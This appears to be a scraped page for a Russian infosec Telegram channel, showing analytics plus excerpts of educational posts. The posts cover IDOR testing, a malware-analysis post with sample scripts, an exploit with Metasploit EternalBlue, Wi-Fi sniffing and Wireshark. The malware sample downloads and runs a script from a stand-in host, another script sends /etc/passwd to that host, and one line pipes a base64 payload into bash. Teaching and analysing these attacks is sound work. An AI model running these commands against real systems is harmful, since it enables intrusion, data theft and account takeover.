CodeGuard: PySec Edition
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Больше📈 Аналитический обзор Telegram-канала CodeGuard: PySec Edition
Канал CodeGuard: PySec Edition является активным участником. Сейчас сообщество объединяет 14 180 подписчиков, занимая 8 724 место в категории Технологии и приложения и 45 616 место в регионе Россия.
📊 Показатели аудитории и динамика
С момента создания невідомо проект демонстрирует стремительный рост, собрав аудиторию из 14 180 подписчиков.
Согласно последним данным от 29 сентября, 2026, канал показывает стабильную активность. За последние 30 дней изменение числа участников составило 873, а за последние 24 часа — 56, при этом общий охват остаётся высоким.
- Статус верификации: Не верифицирован
- Уровень вовлечённости (ER): Средний показатель вовлечённости аудитории составляет 9.97%. В первые 24 часа после публикации контент обычно набирает 5.53% реакций от общего числа подписчиков.
- Охват публикаций: В среднем каждый пост получает 1 413 просмотров. В течение первых суток публикация набирает 784 просмотров.
- Реакции и взаимодействия: Аудитория активно поддерживает контент: среднее количество реакций на один пост — 6.
- Тематические интересы: Контент сосредоточен на ключевых темах, таких как codeguard, pysec, docker, grep, контейнер.
📝 Описание и контентная политика
Автор описывает ресурс как площадку для выражения субъективного мнения:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Благодаря высокой частоте обновлений (последние данные получены 30 сентября, 2026) канал поддерживает актуальность и высокий уровень охвата публикаций. Аналитика показывает, что аудитория активно взаимодействует с контентом, что делает его важной точкой влияния в категории Технологии и приложения.
PySec Edition Материалы по кибербезу. Linux Не для всех, но именно для тебя. SciencePop Научно-популярный журнал для инженеров и разработчиков Vacancy IT Вакансии, фриланс и топовые подборки Chat CodeGuard Сообщество единомышленников, пообщаться и спросить. Archive Шпоры, книги и материалы для обучения. @N3tHunterLab Ламповый канал про ИБ и все что с ним связано.Спасибо, что вы здесь — вместе мы сильнее!
https://api.example.com/users/123где
123 — это ID пользователя.
Используем программу Postman или просто команду curl, чтобы посмотреть, что вернёт сервер:
curl https://api.example.com/users/123 -H "Authorization: Bearer токен_доступа"
Если нет токена, попробуй запросить без него — иногда API плохо проверяет права.
➡️ Шаг 2. Проверяем уязвимость — можно ли получить чужие данные?
Попробуй подставить другой ID пользователя:
curl https://api.example.com/users/124 -H "Authorization: Bearer твой_токен"
Если API вернёт данные пользователя 124, хотя ты должен видеть только свои, значит тут уязвимость — её называют IDOR (Insecure Direct Object Reference).
➡️Шаг 3. Что можно сделать, если уязвимость есть?
Можно читать чужие данные, а иногда — менять их. Например, изменить email:
curl -X PUT https://api.example.com/users/124 \
-H "Authorization: Bearer твой_токен" \
-H "Content-Type: application/json" \
-d '{"email":"hacker@example.com"}'
Если это сработало — значит API не проверяет права правильно, и это опасно.
➡️Шаг 4. Немного автоматизации с Python
Можно быстро проверить, доступен ли чужой аккаунт, заменяя ID:
import requests
url = "https://api.example.com/users/"
token = "твой_токен"
headers = {"Authorization": f"Bearer {token}"}
for user_id in range(120, 130):
r = requests.get(url + str(user_id), headers=headers)
if r.status_code == 200:
print(f"Данные пользователя {user_id} доступны!")
Главное: Проверяй только то, что разрешено, иначе это незаконно.
😈 CodeGuard | #API #pentest #curl #python #vulnerabilityДобро пожаловать в историю самого прибыльного развода в истории интернета. Развода настолько элегантного, так хорошо прорекламированного и так глубоко укоренившегося в хостинг‑индустрии, что он продолжает печатать деньги даже после того, как все знают, что это развод.➡️ Продолжение тут 😈 CodeGuard | #cybersecurity
📌Почему OWASP Juice Shop? - Покрывает все основные уязвимости из списка OWASP Top 10 - Современный стек: Node.js, Express, Angular, что приближает его к реальному вебу - Подходит как новичкам, так и профи для практики и экспериментов - Отслеживание прогресса через баллы — геймификация помогает идти дальшеИзучать веб-безопасность и пентест — попробуй Juice Shop! 😈 CodeGuard | #pentest #infosec #owasp #websecurity #ctf
#!/bin/bash
# Скачиваем вредоносный файл и запускаем
curl -s http://malicious.example.com/malware.sh -o /tmp/malware.sh
chmod +x /tmp/malware.sh
/tmp/malware.sh &
-- Используется curl для загрузки файла с C&C сервера
— Запуск выполняется в фоне — скрытно для пользователя
— Вредоносный payload может быть любым — удалённое выполнение команд, майнинг, шпионаж
👩💻 2. Python-скрипт для сбора и отправки данных
Пример кода на Python, который читает локальный файл с паролями и отправляет на удалённый сервер:
import requests
def steal_data():
with open('/etc/passwd', 'r') as file:
data = file.read()
url = 'http://malicious.example.com/collect'
requests.post(url, data={'content': data})
if __name__ == "__main__":
steal_data()
- Используется модуль requests для HTTP-запроса
- Чтение системного файла /etc/passwd — могут быть и конфиги, и ключи
- Все данные отправляются на фишинговый или контролируемый сервер
🤔 3. Техники маскировки и обхода
- Скрипты часто запускаются из cron или через systemd для постоянства
- Логи и консольный вывод отключают или направляют в /dev/null
- Используются переменные среды и шифрование для сокрытия URL и команд
📖 4. Как анализировать такие скрипты
— Покомандно и построчно читать код — понимать что делает каждая строка
— Использовать bash -x script.sh или добавлять print() в Python для отладки
— Запускать в песочнице (VM) под контролем системы мониторинга
— Перехватывать сетевой трафик с помощью tcpdump или Wireshark
👩💻 5. Мини-скрипт для распаковки закодированных строк в Bash
Иногда payload шифруют base64:
echo "Y3VybCAtcyBodHRwOi8vbWFsaWNpb3VzLmV4YW1wbGUuY29tL21hbHdhcmUuc2g=" | base64 -d | bash
Для анализа достаточно выполнить декодировку:
echo "строка_в_base64" | base64 -d
👩💻 6. Пример Python скрипта для запуска шелл-команд и сбора вывода
import subprocess
cmd = "uname -a"
result = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE)
print(result.stdout.decode())
Эта техника часто используется для сбора информации о системе.
Простые на вид скрипты — это часто высокоэффективные инструменты атак. Важно уметь их читать, распаковывать и анализировать логику. Постоянная практика и инструменты помогут выявлять угрозы.
⭐️ CodeGuard | #malware #bash #python #pentest #reverseengineeringpip install -r requirements.txt
или
sudo apt-get install <пакет>
✅5. Запусти эксплоит с ключами отладки
Добавляй команды вывода для отслеживания:
- Для Bash: поставь set -x в начале скрипта
- Для Python добавь print() для важных переменных
- И запускай из терминала:
python3 exploit.py --target 192.168.0.10
✅6. Анализируй сетевой трафик
Во время запуска эксплоита захватывай трафик с помощью tcpdump или наблюдай через Wireshark:
sudo tcpdump -i eth0 -w exploit_traffic.pcap
wireshark exploit_traffic.pcap
✅7. Мини-пример на Python для теста уязвимости (Buffer Overflow)
import socket
target_ip = "192.168.0.10"
target_port = 9999
payload = b"A" * 1024 # заполняем буфер для взлома
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.send(payload)
print("Payload отправлен!")
s.close()
Этот скрипт посылает 1024 символа ‘A’ на указанный порт — простой тест на переполнение буфера или отслеживание реакции сервера.
✅ 8. Используй Exploit-DB и Metasploit
- Для поиска эксплоитов:
searchsploit <название_уязвимости>
- Запуск Metasploit:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.0.10
run
⚠️ Важное: обязательно анализируй эксплоиты в изолированной и контрольной среде во избежание вреда. Эти навыки — основа в тестировании безопасности.
тебе еще весело? или слишком много надо понимать? желание быть хакером пропадает?)) а это только первые шаги...)
⭐️ CodeGuard | #pentest #exploit #bugbounty #cve🤔 Книга: «Сети глазами хакера» Автор: Базаров М. М. Год: 2025Если интересуешься сетевой безопасностью и хочешь понять, как устроены сети с точки зрения хакера, эта книга — отличный выбор. 👩💻 Что внутри: - Практические рекомендации по пентесту сетей Cisco - Разбор протокола DTP от Cisco Systems - Подробный гайд по тестированию канального уровня сети и безопасности MikroTik - Методики пентестов с минимальным ущербом инфраструктуре - Советы по использованию Kali Linux для эффективного тестирования - Использование виртуальных машин для постэксплуатации - Рекомендации по защите сетей от атак - Примеры техник как для хакеров, так и для защитников 💠 Рекомендуется всем, кто хочет глубже понять внутреннее устройство сетей и методы их проверки безопасности! 💠 Бери книгу → [Archive] 😈 CodeGuard | #book #pentest #networksecurity
Как проходит игра? — Игра организована по уровням, начиная с Уровня 0. — На каждом уровне вам нужно получить пароль для следующего уровня, решая задачи с помощью команд Linux, анализа файлов и системных инструментов. — Завершив уровень, вы используете полученный пароль, чтобы подключиться к следующему пользователю через SSH и перейти дальше.Задачи обучают пониманию основных команд и инструментов, а также навыкам анализа и поиска. 🖥 Начинаем? Подключайтесь по SSH к серверу, начиная с Уровня 0:
ssh bandit0@bandit.labs.overthewire.org -p 2220
password: bandit0
— Первые семь задач я специально подготовил и разместил ниже под этим постом — тут. — Так же под этим постом, есть подсказки + ответы. Рекомендую пользоваться подсказками и не рекомендую пользоваться ответами))— Полный список задачи здесь! — Вопросы по подключению — пиши! Прокачивайтесь, задавайте вопросы и делитесь успехами — вместе точно эффективней. @N3tHunterLab
Как проходит игра? — Игра организована по уровням, начиная с Уровня 0. — На каждом уровне вам нужно получить пароль для следующего уровня, решая задачи с помощью команд Linux, анализа файлов и системных инструментов. — Завершив уровень, вы используете полученный пароль, чтобы подключиться к следующему пользователю через SSH и перейти дальше.Задачи обучают пониманию основных команд и инструментов, а также навыкам анализа и поиска. 🖥 Начинаем? Подключайтесь по SSH к серверу, начиная с Уровня 0:
ssh bandit0@bandit.labs.overthewire.org -p 2220
password: bandit0
— Первые семь задач я специально подготовил и разместил ниже под этим постом. — Так же под этим постом, есть подсказки + ответы. Рекомендую пользоваться подсказками и не рекомендую пользоваться ответами))— Полный список задачи здесь! — Вопросы по подключению — пиши! Прокачивайтесь, задавайте вопросы и делитесь успехами — вместе точно эффективней. @N3tHunterLab
http — отобразить только HTTP-трафик
- ip.addr == 192.168.1.5 — отображать пакеты, связанные с конкретным IP
- tcp.port == 443 — показать трафик HTTPS
- dns — отобразить DNS-запросы и ответы
🔍 Шаг 3: Анализ структуры пакета
Выберите интересующий пакет в списке — в нижних панелях увидите детальную информацию:
- Ethernet Header — MAC-адреса отправителя и получателя
- IP Header — IP-адреса источника и назначения
- TCP/UDP Header — порты и параметры соединения
- Application Layer — данные, например, HTTP-запросы и ответы
💾 Шаг 4: Сохранение и экспорт данных
Захваченные данные можно сохранить в файл для последующего анализа:
File → Save As → выберите формат (например, .pcapng) и место хранения
🛡Пример практического использования:
- Отследите подозрительный IP, используя фильтр: ip.addr == <адрес>
- Анализируйте содержимое HTTP-запросов, чтобы выявить уязвимости и аномалии
⚠️ Помните: использование Wireshark должно соответствовать правилам и этике — перехват сетевого трафика без разрешения владельцев может быть незаконным.
✔️ Полезные ссылки и гайды:
- Подробное руководство на Хабре: [Основы работы с Wireshark]
- Видеообзор и пошаговая установка: [YouTube] Андрей Must have
- Руководство от Timeweb: [Как анализировать трафик через Wireshark]
Ставь 👍, тебе не сложно - мне мотивация пилить посты
😈 CodeGuard | #Wireshark #NetworkAnalysis #SysAdmin✅Защита — nоn fiсtion; ✅Намудрите сложные пароли; ✅Используйте fail2ban; ✅Включите подключение по SSH; ✅Забудьте про root; ✅Используете безопасные протоколы; ✅Актуализируйте версии ОС и ПО; ✅Процедите порты; ✅Подключите двухфакторку; ✅Защитите сервер от DDoS; ✅Логируйте и мониторьте; ✅Выводы.Эти простые шаги могут обезопасить сервер даже от большинства автоматических сканеров и ботов. 🔐 Безопасность — не на уровне «посмотрю по фигу», а на уровне «делаю правильно». 😈 CodeGuard | #security #sysadmin
sudo airmon-ng check kill
sudo airmon-ng start wlan0
Это отключит службы, мешающие работе, и включит мониторинг на интерфейсе wlan0mon.
✔️ 2. Смотрим доступные сети и клиентов
sudo airodump-ng wlan0mon
На экране появится список сетей, их каналов, MAC-адресов и активных клиентов.
✔️ 3. Сохраняем трафик с конкретной точки доступа
sudo airodump-ng --bssid <MAC_точи_доступа> -c <канал> -w capture wlan0mon
Заменяем <MAC_точи_доступа> и <канал> на данные из предыдущего шага, чтобы сфокусироваться на нужной сети.
✔️ 4. Перехватываем трафик с tcpdump
sudo tcpdump -i wlan0mon -w traffic.pcap
Запишет весь трафик в файл для последующего анализа.
✔️ 5. Анализируем в Wireshark
wireshark traffic.pcap
Открываем файл, фильтруем HTTP, DNS или другие протоколы, ищем интересные данные.
Этот пошаговый гайд — отличный старт для понимания сниффинга и мониторинга. Никакой магии, только команды и инструменты.
расскажи другу и поставь 👍
⭐️ CodeGuard | #pentest #kali #wifi